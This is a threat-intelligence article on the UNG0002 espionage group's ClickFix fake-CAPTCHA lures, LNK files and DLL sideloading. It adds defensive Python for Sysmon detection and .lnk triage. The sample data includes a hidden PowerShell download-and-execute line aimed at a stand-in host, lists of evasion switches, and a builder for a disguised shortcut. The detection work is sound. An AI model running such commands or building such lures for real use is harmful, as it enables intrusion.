Tuesday, March 17, 2026

UNG0002 Actors Leverage Weaponized LNK Files Through ClickFix Fake CAPTCHA Pages

Cybersecurity researchers at Seqrite Labs have identified a sophisticated threat group, designated UNG0002, also known as Unknown Group 0002, which has been conducting extensive espionage operations across multiple Asian jurisdictions, including China, Hong Kong, and Pakistan.

The group has shown notable persistence and adaptability, running two major campaigns across more than a year while continuously evolving its tactics and developing custom malware implants.

Multi-Campaign Espionage Operations Target Critical Sectors

UNG0002’s operations encompass two distinct campaigns: Operation Cobalt Whisper, which was active from May 2024 to September 2024, and the more recent Operation AmberMist, running from January 2025 to May 2025.

During Operation Cobalt Whisper, researchers identified 20 infection chains that specifically targeted defense contractors, electrical engineering firms, and civil aviation organizations.

The threat actors demonstrated a strong preference for deploying Cobalt Strike and Metasploit frameworks alongside weaponized shortcut files (LNK) and VBScript components.

The evolution to Operation AmberMist marked a significant tactical shift, with the group expanding its target scope to include gaming companies, software development firms, and academic institutions.

This campaign introduced sophisticated custom implants, including Shadow RAT, Blister DLL Implant, and INET RAT, representing a departure from commercially available frameworks toward proprietary malware development.

Advanced Social Engineering and Technical Evasion Methods

A particularly concerning development in UNG0002’s arsenal is its adoption of the ClickFix technique: a social engineering method in which a fraudulent CAPTCHA “verification” page talks the visitor into pasting a command the page has placed on the clipboard into the Windows Run dialog, so the victim launches the malicious PowerShell script themselves and no exploit or file download is needed to start the chain.

In one documented instance, the group spoofed Pakistan’s Ministry of Maritime Affairs website to deliver malicious payloads, demonstrating their willingness to impersonate government entities.

The threat actors consistently employ DLL sideloading, placing a malicious DLL where a legitimately signed executable, such as the Windows Rasphone dialer (rasphone.exe) or Node-Webkit (NW.js) runtime binaries, will load it in place of the library it expects.

Because the malicious code then runs inside a trusted, signed process, the implant can persist on the compromised host while blending in with legitimate software, which defeats controls that judge activity by the executable’s name or signature alone.
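Detection logic for the two behaviours described above (ClickFix launched from the Run dialog, and sideloading through a relocated system binary), as an added example in Python that is not code from Seqrite or this article: four heuristics applied to Sysmon-style events using Sysmon’s own field names (EventID 1 ProcessCreate, 7 ImageLoad, 13 RegistryValueSet). The events are constructed for this example; the user name, AppData path, the captcha-check.example domain and the rastls.dll filename are assumptions, not indicators from the campaign.

```python
from pathlib import PureWindowsPath

# Field names (Image, ParentImage, CommandLine, ImageLoaded, Signed,
# TargetObject, Details) follow Sysmon's schema; the events below are
# constructed for this example and are not telemetry from the campaign.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
CLICKFIX_MARKERS = ("iex", "invoke-expression", "irm", "invoke-webrequest",
                    "invoke-restmethod", "downloadstring", "-enc", "-w hidden",
                    "-windowstyle hidden")
# System binaries the article names as sideloading hosts; a copy of one
# running outside the trusted roots is itself worth a look (assumption).
RELOCATION_WATCHLIST = {"rasphone.exe"}
TRUSTED_ROOTS = (r"c:\windows", r"c:\program files", r"c:\program files (x86)")


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _parent_dir(path: str) -> str:
    return str(PureWindowsPath(path).parent).lower()


def under_trusted_root(path: str) -> bool:
    d = _parent_dir(path)
    return any(d == root or d.startswith(root + "\\") for root in TRUSTED_ROOTS)


def detect(events):
    """Return (event index, rule name) pairs for every event that trips a rule."""
    hits = []
    for i, ev in enumerate(events):
        eid = ev.get("EventID")
        if eid == 1:  # ProcessCreate
            image, parent = _name(ev["Image"]), _name(ev["ParentImage"])
            cmd = ev.get("CommandLine", "").lower()
            # ClickFix: the victim pastes into Win+R, so the script host is
            # spawned by explorer.exe with download-and-execute switches.
            if image in SCRIPT_HOSTS and parent == "explorer.exe" \
                    and any(m in cmd for m in CLICKFIX_MARKERS):
                hits.append((i, "clickfix_run_dialog"))
            # Sideloading a System32 binary means copying it somewhere the
            # attacker can also drop the DLL, i.e. outside the trusted roots.
            if image in RELOCATION_WATCHLIST and not under_trusted_root(ev["Image"]):
                hits.append((i, "system_binary_relocated"))
        elif eid == 13:  # RegistryValueSet: Win+R history lands in RunMRU
            target = ev["TargetObject"].lower()
            details = ev.get("Details", "").lstrip().lower()
            if "\\explorer\\runmru\\" in target and \
                    details.startswith(("powershell", "pwsh", "mshta", "cmd")):
                hits.append((i, "clickfix_runmru"))
        elif eid == 7:  # ImageLoad
            host, dll = ev["Image"], ev["ImageLoaded"]
            # Classic sideload shape: an unsigned DLL loaded from the host's
            # own directory, and that directory is not a trusted root.
            if dll.lower().endswith(".dll") and ev.get("Signed", "").lower() == "false" \
                    and _parent_dir(host) == _parent_dir(dll) \
                    and not under_trusted_root(host):
                hits.append((i, "dll_sideload_candidate"))
    return hits


STAGING = r"C:\Users\ana\AppData\Roaming\Update"   # constructed path
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LURE_CMD = 'powershell -w hidden -c "iex (irm http://captcha-check.example/verify)"'

# Constructed chain: Run-dialog paste -> hidden PowerShell -> relocated
# rasphone.exe loading an unsigned DLL beside it (DLL name is illustrative).
SAMPLE_EVENTS = [
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": LURE_CMD + r"\1"},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": LURE_CMD},
    {"EventID": 1, "Image": STAGING + r"\rasphone.exe", "ParentImage": PS,
     "CommandLine": STAGING + r"\rasphone.exe"},
    {"EventID": 7, "Image": STAGING + r"\rasphone.exe",
     "ImageLoaded": STAGING + r"\rastls.dll", "Signed": "false"},
    {"EventID": 7, "Image": STAGING + r"\rasphone.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
]

# Constructed benign activity that must not fire: an admin's terminal session,
# a harmless Run-dialog entry, a vendor app loading its own unsigned DLL from
# Program Files, and rasphone.exe run from its real location.
BENIGN_EVENTS = [
    {"EventID": 1, "Image": PS,
     "ParentImage": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe",
     "CommandLine": "powershell.exe -NoLogo -Command Get-Process"},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\b",
     "Details": r"notepad\1"},
    {"EventID": 7, "Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\plugin.dll", "Signed": "false"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rasphone.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "rasphone.exe"},
]

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
    print("benign hits:", detect(BENIGN_EVENTS))
```

The RunMRU rule is the cheap one to add first: the Run dialog writes its history to that key regardless of whether the pasted command succeeded, so it survives even when the PowerShell process itself was short-lived. The sideload rule deliberately keys on directory and signature rather than a fixed DLL name, since the name only has to match what the chosen host imports.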

Technical analysis reveals multi-stage attack chains that begin with malicious LNK (Windows shortcut) files packaged with CV-themed decoy documents.

These documents feature realistic resume profiles, including fake credentials for game UI designers and computer science students from prestigious institutions, tailored to specific target industries.
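The shortcut stage above, taken apart as an added example in Python (not code from Seqrite or this article): a minimal MS-SHLLINK reader that pulls the target path, arguments, working directory, icon source and ShowCommand out of a .lnk, plus triage heuristics for the combinations shortcut lures rely on. The sample shortcut is assembled inline by the same script and is constructed for this example; the PowerShell path, the imageres.dll icon reference and the switches are assumptions about what such a lure looks like, not artifacts from the report, and the encoded payload decodes to a harmless Write-Host.

```python
import base64
import struct
from dataclasses import dataclass

# Layout per MS-SHLLINK: 76-byte ShellLinkHeader, optional LinkTargetIDList and
# LinkInfo, then up to five length-prefixed StringData fields, then ExtraData.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand that opens the window minimised and unfocused
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")
EVASION_SWITCHES = ("-enc", "-w hidden", "-windowstyle hidden", "-nop", "-noprofile",
                    "bypass", "iex", "invoke-expression", "downloadstring")
DOCUMENT_ICON_SOURCES = ("imageres.dll", "shell32.dll", "winword", "acrord32")


@dataclass
class Lnk:
    show_command: int
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def _read_string(buf: bytes, off: int, unicode: bool):
    (count,) = struct.unpack_from("<H", buf, off)  # CountCharacters, no terminator
    off += 2
    width = 2 if unicode else 1
    raw = buf[off:off + count * width]
    text = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")
    return text, off + count * width


def parse_lnk(buf: bytes) -> Lnk:
    if len(buf) < HEADER_SIZE or struct.unpack_from("<I", buf, 0)[0] != HEADER_SIZE \
            or buf[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", buf, 20)
    (show_command,) = struct.unpack_from("<I", buf, 60)
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize does not count itself
        off += 2 + struct.unpack_from("<H", buf, off)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize counts the whole structure
        off += struct.unpack_from("<I", buf, off)[0]
    lnk = Lnk(show_command=show_command)
    for flag, attr in STRING_FIELDS:       # StringData appears in this fixed order
        if flags & flag:
            value, off = _read_string(buf, off, bool(flags & IS_UNICODE))
            setattr(lnk, attr, value)
    return lnk


def triage(lnk: Lnk) -> list:
    """Heuristics for shortcut lures; each hit is a short reason string."""
    target = f"{lnk.relative_path} {lnk.arguments}".lower()
    icon = lnk.icon_location.lower()
    reasons = []
    if any(h in target for h in SCRIPT_HOSTS):
        reasons.append("target is a script host or LOLBin")
    if any(s in target for s in EVASION_SWITCHES):
        reasons.append("hidden-window, encoded or policy-bypass switches")
    if lnk.show_command == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE hides the console")
    if reasons and any(src in icon for src in DOCUMENT_ICON_SOURCES):
        reasons.append("icon borrowed from a document/system source to pass as a file")
    return reasons


def build_lnk(relative_path, working_dir, arguments, icon_location, show_command=1) -> bytes:
    """Assemble a minimal .lnk (constructed here so the parser has input offline)."""
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR
             | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE)
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    item = b"\x1f" + b"placeholder-item"
    id_list = struct.pack("<H", len(item) + 2) + item + b"\x00\x00"  # ItemID + TerminalID
    body = struct.pack("<H", len(id_list)) + id_list
    for s in (relative_path, working_dir, arguments, icon_location):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body + struct.pack("<I", 0)  # TerminalBlock closes ExtraData


# Constructed lure: a document-looking shortcut that actually runs hidden,
# encoded PowerShell. The payload decodes to a harmless Write-Host.
BENIGN_PAYLOAD = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16-le")).decode()
SAMPLE_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    working_dir=r"C:\Windows\System32",
    arguments="-nop -w hidden -ep bypass -enc " + BENIGN_PAYLOAD,
    icon_location=r"%SystemRoot%\System32\imageres.dll",
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    lnk = parse_lnk(SAMPLE_LNK)
    print("target:", lnk.relative_path)
    print("args  :", lnk.arguments)
    for reason in triage(lnk):
        print("flag  :", reason)
```

On a real sample the target usually lives in the LinkTargetIDList rather than RELATIVE_PATH, so a production parser would also walk the ItemIDs; the skip-by-size logic above is still what gets you to the arguments, which is where the hidden command line is.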

Attribution and Geographic Focus

Seqrite Labs assesses with high confidence that UNG0002 originates from Southeast Asia, with a primary focus on espionage activities across the region.

The group demonstrates significant adaptability by mimicking techniques from established threat actor playbooks, thereby complicating attribution efforts.

Notable technical artifacts include PDB paths revealing development environments with codenames “Mustang” and “ShockWave,” potentially indicating deliberate mimicry of existing threat groups.

The persistent nature of UNG0002’s operations, combined with their systematic targeting of critical infrastructure sectors and government entities, positions this threat group as a significant concern for regional cybersecurity.

Their continuous evolution from commercially available tools to custom implants suggests substantial resources and long-term operational planning.
